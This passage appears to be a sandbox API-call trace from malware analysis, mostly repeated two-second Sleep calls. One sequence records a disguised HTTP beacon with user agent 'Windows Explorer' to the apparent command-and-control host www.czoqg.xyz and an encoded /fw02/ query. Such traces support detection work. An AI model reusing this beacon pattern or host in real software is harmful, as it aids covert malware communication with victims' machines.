Sleep (dwMilliseconds=0x7d0) [0175.998] Sleep (dwMilliseconds=0x7d0) [0176.036] Sleep (dwMilliseconds=0x7d0) [0176.069] Sleep (dwMilliseconds=0x7d0) [0176.076] Sleep (dwMilliseconds=0x7d0) [0176.114] Sleep (dwMilliseconds=0x7d0) [0176.152] Sleep (dwMilliseconds=0x7d0) [0176.190] Sleep (dwMilliseconds=0x7d0) [0176.272] Sleep (dwMilliseconds=0x7d0) [0176.290] Sleep (dwMilliseconds=0x7d0) [0176.475] Sleep (dwMilliseconds=0x7d0) [0176.564] Sleep (dwMilliseconds=0x7d0) [0176.605] Sleep (dwMilliseconds=0x7d0) [0176.653] Sleep (dwMilliseconds=0x7d0) [0176.665] Sleep (dwMilliseconds=0x7d0) [0176.669] Sleep (dwMilliseconds=0x7d0) [0176.702] Sleep (dwMilliseconds=0x7d0) [0176.739] Sleep (dwMilliseconds=0x7d0) [0176.783] Sleep (dwMilliseconds=0x7d0) [0176.848] Sleep (dwMilliseconds=0x7d0) [0176.858] Sleep (dwMilliseconds=0x7d0) [0176.960] Sleep (dwMilliseconds=0x7d0) [0177.068] Sleep (dwMilliseconds=0x7d0) [0177.168] Sleep (dwMilliseconds=0x7d0) [0177.173] Sleep (dwMilliseconds=0x7d0) [0177.295] Sleep (dwMilliseconds=0x7d0) [0177.434] Sleep (dwMilliseconds=0x7d0) [0177.476] Sleep (dwMilliseconds=0x7d0) [0177.514] Sleep (dwMilliseconds=0x7d0) [0177.547] Sleep (dwMilliseconds=0x7d0) [0177.551] Sleep (dwMilliseconds=0x7d0) [0177.594] Sleep (dwMilliseconds=0x7d0) [0177.641] Sleep (dwMilliseconds=0x7d0) [0177.680] Sleep (dwMilliseconds=0x7d0) [0177.729] Sleep (dwMilliseconds=0x7d0) [0177.768] Sleep (dwMilliseconds=0x7d0) [0177.776] Sleep (dwMilliseconds=0x7d0) [0177.807] Sleep (dwMilliseconds=0x7d0) [0177.846] Sleep (dwMilliseconds=0x7d0) [0177.884] Sleep (dwMilliseconds=0x7d0) [0177.922] Sleep (dwMilliseconds=0x7d0) [0177.931] Sleep (dwMilliseconds=0x7d0) [0177.964] Sleep (dwMilliseconds=0x7d0) [0178.000] Sleep (dwMilliseconds=0x7d0) [0178.037] Sleep (dwMilliseconds=0x7d0) [0178.044] Sleep (dwMilliseconds=0x7d0) [0178.075] Sleep (dwMilliseconds=0x7d0) [0178.112] Sleep (dwMilliseconds=0x7d0) [0178.148] Sleep (dwMilliseconds=0x7d0) [0178.155] Sleep (dwMilliseconds=0x7d0) [0178.337] Sleep (dwMilliseconds=0x7d0) [0178.443] Sleep (dwMilliseconds=0x7d0) [0178.482] Sleep (dwMilliseconds=0x7d0) [0178.517] Sleep (dwMilliseconds=0x7d0) [0178.522] Sleep (dwMilliseconds=0x7d0) [0178.528] Sleep (dwMilliseconds=0x7d0) [0178.564] Sleep (dwMilliseconds=0x7d0) [0178.601] Sleep (dwMilliseconds=0x7d0) [0178.648] Sleep (dwMilliseconds=0x7d0) [0178.679] Sleep (dwMilliseconds=0x7d0) [0178.689] Sleep (dwMilliseconds=0x7d0) [0178.729] Sleep (dwMilliseconds=0x7d0) [0178.801] Sleep (dwMilliseconds=0x7d0) [0178.838] Sleep (dwMilliseconds=0x7d0) [0178.857] Sleep (dwMilliseconds=0x7d0) [0178.877] Sleep (dwMilliseconds=0x7d0) [0178.915] Sleep (dwMilliseconds=0x7d0) [0178.952] Sleep (dwMilliseconds=0x7d0) [0178.981] Sleep (dwMilliseconds=0x7d0) [0178.990] Sleep (dwMilliseconds=0x7d0) [0179.026] Sleep (dwMilliseconds=0x7d0) [0179.061] Sleep (dwMilliseconds=0x7d0) [0179.090] Sleep (dwMilliseconds=0x7d0) [0179.336] Sleep (dwMilliseconds=0x7d0) [0179.435] Sleep (dwMilliseconds=0x7d0) [0179.475] Sleep (dwMilliseconds=0x7d0) [0179.514] Sleep (dwMilliseconds=0x7d0) [0179.531] Sleep (dwMilliseconds=0x7d0) [0179.554] Sleep (dwMilliseconds=0x7d0) [0179.589] Sleep (dwMilliseconds=0x7d0) [0179.640] Sleep (dwMilliseconds=0x7d0) [0179.665] Sleep (dwMilliseconds=0x7d0) [0179.682] Sleep (dwMilliseconds=0x7d0) [0179.720] Sleep (dwMilliseconds=0x7d0) [0179.761] Sleep (dwMilliseconds=0x7d0) [0179.797] Sleep (dwMilliseconds=0x7d0) [0179.826] Sleep (dwMilliseconds=0x7d0) [0179.838] Sleep (dwMilliseconds=0x7d0) [0179.875] Sleep (dwMilliseconds=0x7d0) [0179.913] Sleep (dwMilliseconds=0x7d0) [0179.980] Sleep (dwMilliseconds=0x7d0) [0180.013] Sleep (dwMilliseconds=0x7d0) [0180.020] Sleep (dwMilliseconds=0x7d0) [0180.141] Sleep (dwMilliseconds=0x7d0) [0180.275] Sleep (dwMilliseconds=0x7d0) [0180.381] Sleep (dwMilliseconds=0x7d0) [0180.418] Sleep (dwMilliseconds=0x7d0) [0180.423] Sleep (dwMilliseconds=0x7d0) [0180.462] Sleep (dwMilliseconds=0x7d0) [0180.501] Sleep (dwMilliseconds=0x7d0) [0180.539] Sleep (dwMilliseconds=0x7d0) [0180.574] Sleep (dwMilliseconds=0x7d0) [0180.577] Sleep (dwMilliseconds=0x7d0) [0180.614] Sleep (dwMilliseconds=0x7d0) [0180.663] Sleep (dwMilliseconds=0x7d0) [0180.703] Sleep (dwMilliseconds=0x7d0) [0180.741] Sleep (dwMilliseconds=0x7d0) [0180.751] Sleep (dwMilliseconds=0x7d0) [0180.784] Sleep (dwMilliseconds=0x7d0) [0180.825] Sleep (dwMilliseconds=0x7d0) [0180.864] Sleep (dwMilliseconds=0x7d0) [0180.916] Sleep (dwMilliseconds=0x7d0) [0180.956] Sleep (dwMilliseconds=0x7d0) [0180.984] Sleep (dwMilliseconds=0x7d0) [0181.012] Sleep (dwMilliseconds=0x7d0) [0181.332] Sleep (dwMilliseconds=0x7d0) [0181.421] Sleep (dwMilliseconds=0x7d0) [0181.465] Sleep (dwMilliseconds=0x7d0) [0181.505] Sleep (dwMilliseconds=0x7d0) [0181.523] Sleep (dwMilliseconds=0x7d0) [0181.551] Sleep (dwMilliseconds=0x7d0) [0181.597] Sleep (dwMilliseconds=0x7d0) [0181.653] Sleep (dwMilliseconds=0x7d0) [0181.692] Sleep (dwMilliseconds=0x7d0) [0181.709] Sleep (dwMilliseconds=0x7d0) [0181.760] Sleep (dwMilliseconds=0x7d0) [0181.800] Sleep (dwMilliseconds=0x7d0) [0181.839] Sleep (dwMilliseconds=0x7d0) [0182.053] Sleep (dwMilliseconds=0x7d0) [0182.176] Sleep (dwMilliseconds=0x7d0) [0182.199] Sleep (dwMilliseconds=0x7d0) [0182.236] Sleep (dwMilliseconds=0x7d0) [0182.297] Sleep (dwMilliseconds=0x7d0) [0182.372] Sleep (dwMilliseconds=0x7d0) [0182.407] Sleep (dwMilliseconds=0x7d0) [0182.422] Sleep (dwMilliseconds=0x7d0) [0182.479] Sleep (dwMilliseconds=0x7d0) [0182.520] Sleep (dwMilliseconds=0x7d0) [0182.557] Sleep (dwMilliseconds=0x7d0) [0182.577] Sleep (dwMilliseconds=0x7d0) [0182.603] Sleep (dwMilliseconds=0x7d0) [0182.655] Sleep (dwMilliseconds=0x7d0) [0182.699] Sleep (dwMilliseconds=0x7d0) [0182.736] Sleep (dwMilliseconds=0x7d0) [0182.766] Sleep (dwMilliseconds=0x7d0) [0182.779] Sleep (dwMilliseconds=0x7d0) [0182.816] Sleep (dwMilliseconds=0x7d0) [0182.856] Sleep (dwMilliseconds=0x7d0) [0182.892] Sleep (dwMilliseconds=0x7d0) [0182.901] Sleep (dwMilliseconds=0x7d0) [0182.932] Sleep (dwMilliseconds=0x7d0) [0182.968] Sleep (dwMilliseconds=0x7d0) [0183.078] Sleep (dwMilliseconds=0x7d0) [0183.198] Sleep (dwMilliseconds=0x7d0) [0183.338] Sleep (dwMilliseconds=0x7d0) [0183.378] Sleep (dwMilliseconds=0x7d0) [0183.416] Sleep (dwMilliseconds=0x7d0) [0183.454] Sleep (dwMilliseconds=0x7d0) [0183.509] Sleep (dwMilliseconds=0x7d0) [0183.529] Sleep (dwMilliseconds=0x7d0) [0183.566] Sleep (dwMilliseconds=0x7d0) [0183.603] Sleep (dwMilliseconds=0x7d0) [0183.641] Sleep (dwMilliseconds=0x7d0) [0183.652] Sleep (dwMilliseconds=0x7d0) [0183.690] Sleep (dwMilliseconds=0x7d0) [0183.726] Sleep (dwMilliseconds=0x7d0) [0183.848] Sleep (dwMilliseconds=0x7d0) [0183.919] Sleep (dwMilliseconds=0x7d0) [0184.018] Sleep (dwMilliseconds=0x7d0) [0184.154] Sleep (dwMilliseconds=0x7d0) [0184.195] Sleep (dwMilliseconds=0x7d0) [0184.236] Sleep (dwMilliseconds=0x7d0) [0184.248] Sleep (dwMilliseconds=0x7d0) [0184.309] Sleep (dwMilliseconds=0x7d0) [0184.348] Sleep (dwMilliseconds=0x7d0) [0184.384] Sleep (dwMilliseconds=0x7d0) [0184.421] Sleep (dwMilliseconds=0x7d0) [0184.426] Sleep (dwMilliseconds=0x7d0) [0184.460] Sleep (dwMilliseconds=0x7d0) [0184.497] Sleep (dwMilliseconds=0x7d0) [0184.533] Sleep (dwMilliseconds=0x7d0) [0184.546] Sleep (dwMilliseconds=0x7d0) [0184.571] Sleep (dwMilliseconds=0x7d0) [0184.608] Sleep (dwMilliseconds=0x7d0) [0184.653] Sleep (dwMilliseconds=0x7d0) [0184.672] Sleep (dwMilliseconds=0x7d0) [0184.951] Sleep (dwMilliseconds=0x7d0) [0185.030] Sleep (dwMilliseconds=0x7d0) [0185.069] Sleep (dwMilliseconds=0x7d0) [0185.108] Sleep (dwMilliseconds=0x7d0) [0185.123] Sleep (dwMilliseconds=0x7d0) [0185.165] Sleep (dwMilliseconds=0x7d0) [0185.202] Sleep (dwMilliseconds=0x7d0) [0185.237] Sleep (dwMilliseconds=0x7d0) [0185.286] Sleep (dwMilliseconds=0x7d0) [0185.289] Sleep (dwMilliseconds=0x7d0) [0185.325] Sleep (dwMilliseconds=0x7d0) [0185.360] Sleep (dwMilliseconds=0x7d0) [0185.398] Sleep (dwMilliseconds=0x7d0) [0185.422] Sleep (dwMilliseconds=0x7d0) [0185.435] Sleep (dwMilliseconds=0x7d0) [0185.471] Sleep (dwMilliseconds=0x7d0) [0185.509] Sleep (dwMilliseconds=0x7d0) [0185.548] Sleep (dwMilliseconds=0x7d0) [0185.584] Sleep (dwMilliseconds=0x7d0) [0185.603] Sleep (dwMilliseconds=0x7d0) [0185.623] Sleep (dwMilliseconds=0x7d0) [0185.680] Sleep (dwMilliseconds=0x7d0) [0185.716] Sleep (dwMilliseconds=0x7d0) [0185.748] Sleep (dwMilliseconds=0x7d0) [0185.749] Sleep (dwMilliseconds=0x7d0) [0185.752] Sleep (dwMilliseconds=0x7d0) [0185.787] Sleep (dwMilliseconds=0x7d0) [0185.823] Sleep (dwMilliseconds=0x7d0) [0185.859] Sleep (dwMilliseconds=0x7d0) [0185.932] Sleep (dwMilliseconds=0x7d0) [0185.937] Sleep (dwMilliseconds=0x7d0) [0185.938] Sleep (dwMilliseconds=0x7d0) [0185.970] Sleep (dwMilliseconds=0x7d0) [0186.006] Sleep (dwMilliseconds=0x7d0) [0186.042] Sleep (dwMilliseconds=0x7d0) [0186.052] Sleep (dwMilliseconds=0x7d0) [0186.078] Sleep (dwMilliseconds=0x7d0) [0186.114] Sleep (dwMilliseconds=0x7d0) [0186.281] InternetOpenA (lpszAgent="Windows Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0186.486] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.czoqg.xyz", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0186.488] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fw02/?ZZI=i8U3GOpzdfOw2GgzvLmi5UUBcFXKNl9MVWatKm+oWi3pb1CAVMFUg5iZfze9PYgRR7t+FA==&elzp=TTtX", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x1) returned 0xcc000c [0186.491] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0212.933] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0212.933] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0212.933] Sleep (dwMilliseconds=0x7d0) [0212.935] Sleep (dwMilliseconds=0x7d0) [0212.936] Sleep (dwMilliseconds=0x7d0) [0212.938] Sleep (dwMilliseconds=0x7d0) [0212.939] Sleep (dwMilliseconds=0x7d0) [0212.941] Sleep (dwMilliseconds=0x7d0) [0212.942] Sleep (dwMilliseconds=0x7d0) [0212.944] Sleep (dwMilliseconds=0x7d0) [0212.945] Sleep (dwMilliseconds=0x7d0) [0212.947] Sleep (dwMilliseconds=0x7d0) [0212.948] Sleep (dwMilliseconds=0x7d0) [0212.950] Sleep (dwMilliseconds=0x7d0) [0212.951] Sleep (dwMilliseconds=0x7d0) [0212.953] Sleep (dwMilliseconds=0x7d0) [0212.954] Sleep (dwMilliseconds=0x7d0) [0212.956] Sleep (dwMilliseconds=0x7d0) [0212.957] Sleep (dwMilliseconds=0x7d0) [0212.959] Sleep (dwMilliseconds=0x7d0) [0212.960] Sleep (dwMilliseconds=0x7d0) [0212.962] Sleep (dwMilliseconds=0x7d0) [0212.963] Sleep (dwMilliseconds=0x7d0) [0212.965] Sleep (dwMilliseconds=0x7d0) [0212.966] Sleep (dwMilliseconds=0x7d0) [0212.968] Sleep (dwMilliseconds=0x7d0) [0212.969] Sleep (dwMilliseconds=0x7d0) [0212.971] Sleep (dwMilliseconds=0x7d0) [0212.972] Sleep (dwMilliseconds=0x7d0) [0212.974] Sleep (dwMilliseconds=0x7d0) [0212.975] Sleep (dwMilliseconds=0x7d0) [0212.977] Sleep (dwMilliseconds=0x7d0) [0212.978] Sleep (dwMilliseconds=0x7d0) [0212.980] Sleep (dwMilliseconds=0x7d0) [0212.981] Sleep (dwMilliseconds=0x7d0) [0212.983] Sleep (dwMilliseconds=0x7d0) [0212.984] Sleep (dwMilliseconds=0x7d0) [0212.986] Sleep (dwMilliseconds=0x7d0) [0212.987] Sleep (dwMilliseconds=0x7d0) [0212.989] Sleep (dwMilliseconds=0x7d0) [0212.990] Sleep (dwMilliseconds=0x7d0) [0212.992] Sleep (dwMilliseconds=0x7d0) [0212.993] Sleep (dwMilliseconds=0x7d0) [0212.995] Sleep (dwMilliseconds=0x7d0) [0212.996] Sleep (dwMilliseconds=0x7d0) [0212.998] Sleep (dwMilliseconds=0x7d0) [0212.999] Sleep (dwMilliseconds=0x7d0) [0213.001] Sleep (dwMilliseconds=0x7d0) [0213.002] Sleep (dwMilliseconds=0x7d0) [0213.005] Sleep (dwMilliseconds=0x7d0) [0213.006] Sleep (dwMilliseconds=0x7d0) [0213.008] Sleep (dwMilliseconds=0x7d0) [0213.009] Sleep (dwMilliseconds=0x7d0) [0213.011] Sleep (dwMilliseconds=0x7d0) [0213.012] Sleep (dwMilliseconds=0x7d0) [0213.014] Sleep (dwMilliseconds=0x7d0) [0213.015] Sleep (dwMilliseconds=0x7d0) [0213.017] Sleep (dwMilliseconds=0x7d0) [0213.020] Sleep (dwMilliseconds=0x7d0) [0213.022] Sleep (dwMilliseconds=0x7d0) [0213.023] Sleep (dwMilliseconds=0x7d0) [0213.025] Sleep (dwMilliseconds=0x7d0) [0213.026] Sleep (dwMilliseconds=0x7d0) [0213.028] Sleep (dwMilliseconds=0x7d0) [0213.029] Sleep (dwMilliseconds=0x7d0) [0213.031] Sleep (dwMilliseconds=0x7d0) [0213.032] Sleep (dwMilliseconds=0x7d0) [0213.034] Sleep (dwMilliseconds=0x7d0) [0213.035] Sleep (dwMilliseconds=0x7d0) [0213.037] Sleep (dwMilliseconds=0x7d0) [0213.038] Sleep (dwMilliseconds=0x7d0) [0213.040] Sleep (dwMilliseconds=0x7d0) [0213.041] Sleep (dwMilliseconds=0x7d0) [0213.043] Sleep (dwMilliseconds=0x7d0) [0213.044] Sleep (dwMilliseconds=0x7d0) [0213.046] Sleep (dwMilliseconds=0x7d0) [0213.047] Sleep (dwMilliseconds=0x7d0) [0213.051] Sleep (dwMilliseconds=0x7d0) [0213.053] Sleep (dwMilliseconds=0x7d0) [0213.054] Sleep (dwMilliseconds=0x7d0) [0213.056] Sleep (dwMilliseconds=0x7d0) [0213.057] Sleep (dwMilliseconds=0x7d0) [0213.059] Sleep (dwMilliseconds=0x7d0) [0213.060] Sleep (dwMilliseconds=0x7d0) [0213.062] Sleep (dwMilliseconds=0x7d0) [0213.063] Sleep (dwMilliseconds=0x7d0) [0213.065] Sleep (dwMilliseconds=0x7d0) [0213.066] Sleep (dwMilliseconds=0x7d0) [0213.068] Sleep (dwMilliseconds=0x7d0) [0213.069] Sleep (dwMilliseconds=0x7d0) [0213.071] Sleep (dwMilliseconds=0x7d0) [0213.072] Sleep (dwMilliseconds=0x7d0) [0213.074] Sleep (dwMilliseconds=0x7d0) [0213.075] Sleep (dwMilliseconds=0x7d0) [0213.077] Sleep (dwMilliseconds=0x7d0) [0213.078] Sleep (dwMilliseconds=0x7d0) [0213.080] Sleep (dwMilliseconds=0x7d0) [0213.081] Sleep (dwMilliseconds=0x7d0) [0213.083] Sleep (dwMilliseconds=0x7d0) [0213.084] Sleep (dwMilliseconds=0x7d0) [0213.086] Sleep (dwMilliseconds=0x7d0) [0213.087] Sleep (dwMilliseconds=0x7d0) [0213.089] Sleep (dwMilliseconds=0x7d0) [0213.090] Sleep (dwMilliseconds=0x7d0) [0213.092] Sleep (dwMilliseconds=0x7d0) [0213.093] Sleep (dwMilliseconds=0x7d0) [0213.095] Sleep (dwMilliseconds=0x7d0) [0213.096] Sleep (dwMilliseconds=0x7d0) [0213.098] Sleep (dwMilliseconds=0x7d0) [0213.099] Sleep (dwMilliseconds=0x7d0) [0213.101] Sleep (dwMilliseconds=0x7d0) [0213.102] Sleep (dwMilliseconds=0x7d0) [0213.104] Sleep (dwMilliseconds=0x7d0) [0213.105] Sleep (dwMilliseconds=0x7d0) [0213.107] Sleep (dwMilliseconds=0x7d0) [0213.108] Sleep (dwMilliseconds=0x7d0) [0213.110] Sleep (dwMilliseconds=0x7d0) [0213.111] Sleep (dwMilliseconds=0x7d0) [0213.113] Sleep (dwMilliseconds=0x7d0) [0213.114] Sleep (dwMilliseconds=0x7d0) [0213.116] Sleep (dwMilliseconds=0x7d0) [0213.117] Sleep (dwMilliseconds=0x7d0) [0213.122] Sleep (dwMilliseconds=0x7d0) [0213.124] Sleep (dwMilliseconds=0x7d0) [0213.125] Sleep (dwMilliseconds=0x7d0) [0213.127] Sleep (dwMilliseconds=0x7d0) [0213.128] Sleep (dwMilliseconds=0x7d0) [0213.130] Sleep (dwMilliseconds=0x7d0) [0213.132] Sleep (dwMilliseconds=0x7d0) [0213.133] Sleep (dwMilliseconds=0x7d0) [0213.135] Sleep (dwMilliseconds=0x7d0) [0213.136] Sleep (dwMilliseconds=0x7d0) [0213.138] Sleep (dwMilliseconds=0x7d0) [0213.139] Sleep (dwMilliseconds=0x7d0) [0213.141] Sleep (dwMilliseconds=0x7d0) [0213.142] Sleep (dwMilliseconds=0x7d0) [0213.144] Sleep (dwMilliseconds=0x7d0) [0213.145] Sleep (dwMilliseconds=0x7d0) [0213.147] Sleep (dwMilliseconds=0x7d0) [0213.148] Sleep (dwMilliseconds=0x7d0) [0213.150] Sleep (dwMilliseconds=0x7d0) [0213.151] Sleep (dwMilliseconds=0x7d0) [0213.153] Sleep (dwMilliseconds=0x7d0) [0213.154] Sleep (dwMilliseconds=0x7d0) [0213.156] Sleep (dwMilliseconds=0x7d0) [0213.157] Sleep (dwMilliseconds=0x7d0) [0213.159] Sleep (dwMilliseconds=0x7d0) [0213.160] Sleep (dwMilliseconds=0x7d0) [0213.162] Sleep (dwMilliseconds=0x7d0) [0213.163] Sleep (dwMilliseconds=0x7d0) [0213.166] Sleep (dwMilliseconds=0x7d0) [0213.168] Sleep (dwMilliseconds=0x7d0) [0213.170] Sleep (dwMilliseconds=0x7d0) [0213.171] Sleep (dwMilliseconds=0x7d0) [0213.173] Sleep (dwMilliseconds=0x7d0) [0213.174] Sleep (dwMilliseconds=0x7d0) [0213.176] Sleep (dwMilliseconds=0x7d0) [0213.177] Sleep (dwMilliseconds=0x7d0) [0213.179] Sleep (dwMilliseconds=0x7d0) [0213.180] Sleep (dwMilliseconds=0x7d0) [0213.182] Sleep (dwMilliseconds=0x7d0) [0213.185] Sleep (dwMilliseconds=0x7d0) [0213.187] Sleep (dwMilliseconds=0x7d0) [0213.190] Sleep (dwMilliseconds=0x7d0) [0213.191] Sleep (dwMilliseconds=0x7d0) [0213.192] Sleep (dwMilliseconds=0x7d0) [0213.194] Sleep (dwMilliseconds=0x7d0) [0213.195] Sleep (dwMilliseconds=0x7d0) [0213.197] Sleep (dwMilliseconds=0x7d0) [0213.198] Sleep (dwMilliseconds=0x7d0) [0213.200] Sleep (dwMilliseconds=0x7d0) [0213.201] Sleep (dwMilliseconds=0x7d0) [0213.203] Sleep (dwMilliseconds=0x7d0) [0213.204] Sleep (dwMilliseconds=0x7d0) [0213.206] Sleep (dwMilliseconds=0x7d0) [0213.207] Sleep (dwMilliseconds=0x7d0) [0213.209] Sleep (dwMilliseconds=0x7d0) [0213.210] Sleep (dwMilliseconds=0x7d0) [0213.212] Sleep (dwMilliseconds=0x7d0) [0213.213] Sleep (dwMilliseconds=0x7d0) [0213.215] Sleep (dwMilliseconds=0x7d0) [0213.217] Sleep (dwMilliseconds=0x7d0) [0213.219] Sleep (dwMilliseconds=0x7d0) [0213.221] Sleep (dwMilliseconds=0x7d0) [0213.223] Sleep (dwMilliseconds=0x7d0) [0213.224] Sleep (dwMilliseconds=0x7d0) [0213.226] Sleep (dwMilliseconds=0x7d0) [0213.227] Sleep (dwMilliseconds=0x7d0) [0213.229] Sleep (dwMilliseconds=0x7d0) [0213.230] Sleep (dwMilliseconds=0x7d0) [0213.232] Sleep (dwMilliseconds=0x7d0) [0213.233] Sleep (dwMilliseconds=0x7d0) [0213.235] Sleep (dwMilliseconds=0x7d0) [0213.236] Sleep (dwMilliseconds=0x7d0) [0213.238] Sleep (dwMilliseconds=0x7d0) [0213.239] Sleep (dwMilliseconds=0x7d0) [0213.241] Sleep (dwMilliseconds=0x7d0) [0213.242] Sleep (dwMilliseconds=0x7d0) [0213.244] Sleep (dwMilliseconds=0x7d0) [0213.245] Sleep (dwMilliseconds=0x7d0) [0213.247] Sleep (dwMilliseconds=0x7d0) [0213.248] Sleep (dwMilliseconds=0x7d0) [0213.250] Sleep (dwMilliseconds=0x7d0) [0213.251] Sleep (dwMilliseconds=0x7d0) [0213.253] Sleep (dwMilliseconds=0x7d0) [0213.254] Sleep (dwMilliseconds=0x7d0) [0213.256] Sleep (dwMilliseconds=0x7d0) [0213.258] Sleep (dwMilliseconds=0x7d0) [0213.259] Sleep (dwMilliseconds=0x7d0) [0213.261] Sleep (dwMilliseconds=0x7d0) [0213.262] Sleep (dwMilliseconds=0x7d0) [0213.264] Sleep (dwMilliseconds=0x7d0) [0213.265] Sleep (dwMilliseconds=0x7d0) [0213.267] Sleep (dwMilliseconds=0x7d0) [0213.268] Sleep (dwMilliseconds=0x7d0) [0213.270] Sleep (dwMilliseconds=0x7d0) [0213.271] Sleep (dwMilliseconds=0x7d0) [0213.273] Sleep (dwMilliseconds=0x7d0) [0213.274] Sleep (dwMilliseconds=0x7d0) [0213.276] Sleep (dwMilliseconds=0x7d0) [0213.277] Sleep (dwMilliseconds=0x7d0) [0213.279] Sleep (dwMilliseconds=0x7d0) [0213.280] Sleep (dwMilliseconds=0x7d0) [0213.282] Sleep (dwMilliseconds=0x7d0) [0213.283] Sleep (dwMilliseconds=0x7d0) [0213.285] Sleep (dwMilliseconds=0x7d0) [0213.286] Sleep (dwMilliseconds=0x7d0) [0213.288] Sleep (dwMilliseconds=0x7d0) [0213.289] Sleep (dwMilliseconds=0x7d0) [0213.291] Sleep (dwMilliseconds=0x7d0) [0213.292] Sleep (dwMilliseconds=0x7d0) [0213.294] Sleep (dwMilliseconds=0x7d0) [0213.373] Sleep (dwMilliseconds=0x7d0) [0213.408] Sleep (dwMilliseconds=0x7d0) [0213.410] Sleep (dwMilliseconds=0x7d0) [0213.412] Sleep (dwMilliseconds=0x7d0) [0213.413] Sleep (dwMilliseconds=0x7d0) [0213.415] Sleep (dwMilliseconds=0x7d0) [0213.416] Sleep (dwMilliseconds=0x7d0) [0213.418] Sleep (dwMilliseconds=0x7d0) [0213.419] Sleep (dwMilliseconds=0x7d0) [0213.422] Sleep (dwMilliseconds=0x7d0) [0213.423] Sleep (dwMilliseconds=0x7d0) [0213.425] Sleep (dwMilliseconds=0x7d0) [0213.426] Sleep (dwMilliseconds=0x7d0) [0213.428] Sleep (dwMilliseconds=0x7d0) [0213.429] Sleep (dwMilliseconds=0x7d0) [0213.431] Sleep (dwMilliseconds=0x7d0) [0213.432] Sleep (dwMilliseconds=0x7d0) [0213.434] Sleep (dwMilliseconds=0x7d0) [0213.435] Sleep (dwMilliseconds=0x7d0) [0213.437] Sleep (dwMilliseconds=0x7d0) [0213.438] Sleep (dwMilliseconds=0x7d0) [0213.440] Sleep (dwMilliseconds=0x7d0) [0213.441] Sleep (dwMilliseconds=0x7d0) [0213.443] Sleep (dwMilliseconds=0x7d0) [0213.444] Sleep (dwMilliseconds=0x7d0) [0213.446] Sleep (dwMilliseconds=0x7d0) [0213.447] Sleep (dwMilliseconds=0x7d0) [0213.449] Sleep (dwMilliseconds=0x7d0) [0213.450] Sleep (dwMilliseconds=0x7d0) [0213.452] Sleep (dwMilliseconds=0x7d0) [0213.453] Sleep (dwMilliseconds=0x7d0) [0213.455] Sleep (dwMilliseconds=0x7d0) [0213.456] Sleep (dwMilliseconds=0x7d0) [0213.486] Sleep (dwMilliseconds=0x7d0) [0213.523] Sleep (dwMilliseconds=0x7d0) [0213.556] Sleep (dwMilliseconds=0x7d0) [0213.557] Sleep (dwMilliseconds=0x7d0) [0213.559] Sleep (dwMilliseconds=0x7d0) [0213.594] Sleep (dwMilliseconds=0x7d0) [0213.629] Sleep (dwMilliseconds=0x7d0) [0213.665] Sleep (dwMilliseconds=0x7d0) [0213.673] Sleep (dwMilliseconds=0x7d0) [0213.701] Sleep (dwMilliseconds=0x7d0) [0213.737] Sleep (dwMilliseconds=0x7d0) [0213.772] Sleep (dwMilliseconds=0x7d0) [0213.785] Sleep (dwMilliseconds=0x7d0) [0213.809] Sleep (dwMilliseconds=0x7d0) [0213.845] Sleep (dwMilliseconds=0x7d0) [0213.882] Sleep (dwMilliseconds=0x7d0) [0213.930] Sleep (dwMilliseconds=0x7d0) [0213.943] Sleep (dwMilliseconds=0x7d0) [0213.972] Sleep (dwMilliseconds=0x7d0) [0214.007] Sleep (dwMilliseconds=0x7d0) [0214.045] Sleep (dwMilliseconds=0x7d0) [0214.081] Sleep (dwMilliseconds=0x7d0) [0214.094] Sleep (dwMilliseconds=0x7d0) [0214.120] Sleep (dwMilliseconds=0x7d0) [0214.155] Sleep (dwMilliseconds=0x7d0) [0214.192] Sleep (dwMilliseconds=0x7d0) [0214.227] Sleep (dwMilliseconds=0x7d0) [0214.243] Sleep (dwMilliseconds=0x7d0) [0214.266] Sleep (dwMilliseconds=0x7d0) [0214.302] Sleep (dwMilliseconds=0x7d0) [0214.361] Sleep (dwMilliseconds=0x7d0) [0214.391] Sleep (dwMilliseconds=0x7d0) [0214.392] Sleep (dwMilliseconds=0x7d0) [0214.399] Sleep (dwMilliseconds=0x7d0) [0214.434] Sleep (dwMilliseconds=0x7d0) [0214.470] Sleep (dwMilliseconds=0x7d0) [0214.544] Sleep (dwMilliseconds=0x7d0) [0214.548] Sleep (dwMilliseconds=0x7d0) [0214.549] Sleep (dwMilliseconds=0x7d0) [0214.581] Sleep (dwMilliseconds=0x7d0) [0214.616] Sleep (dwMilliseconds=0x7d0) [0214.652] Sleep (dwMilliseconds=0x7d0) [0214.659] Sleep (dwMilliseconds=0x7d0) [0214.689] Sleep (dwMilliseconds=0x7d0) [0214.727] Sleep (dwMilliseconds=0x7d0) [0214.763] Sleep (dwMilliseconds=0x7d0) [0214.801] Sleep (dwMilliseconds=0x7d0) [0214.808] Sleep (dwMilliseconds=0x7d0) [0214.809] Sleep (dwMilliseconds=0x7d0) [0214.838] Sleep (dwMilliseconds=0x7d0) [0214.876] Sleep (dwMilliseconds=0x7d0) [0214.918] Sleep (dwMilliseconds=0x7d0) [0214.957] Sleep (dwMilliseconds=0x7d0) [0214.993] Sleep (dwMilliseconds=0x7d0) [0215.031] Sleep (dwMilliseconds=0x7d0) [0215.067] Sleep (dwMilliseconds=0x7d0) [0215.104] Sleep (dwMilliseconds=0x7d0) [0215.106] Sleep (dwMilliseconds=0x7d0) [0215.107] Sleep (dwMilliseconds=0x7d0) [0215.141] Sleep (dwMilliseconds=0x7d0) [0215.178] Sleep (dwMilliseconds=0x7d0) [0215.214] Sleep (dwMilliseconds=0x7d0) [0215.252] Sleep (dwMilliseconds=0x7d0) [0215.257] Sleep (dwMilliseconds=0x7d0) [0215.259] Sleep (dwMilliseconds=0x7d0) [0215.317] Sleep (dwMilliseconds=0x7d0) [0215.454] Sleep (dwMilliseconds=0x7d0) [0215.494] Sleep (dwMilliseconds=0x7d0) [0215.532] Sleep 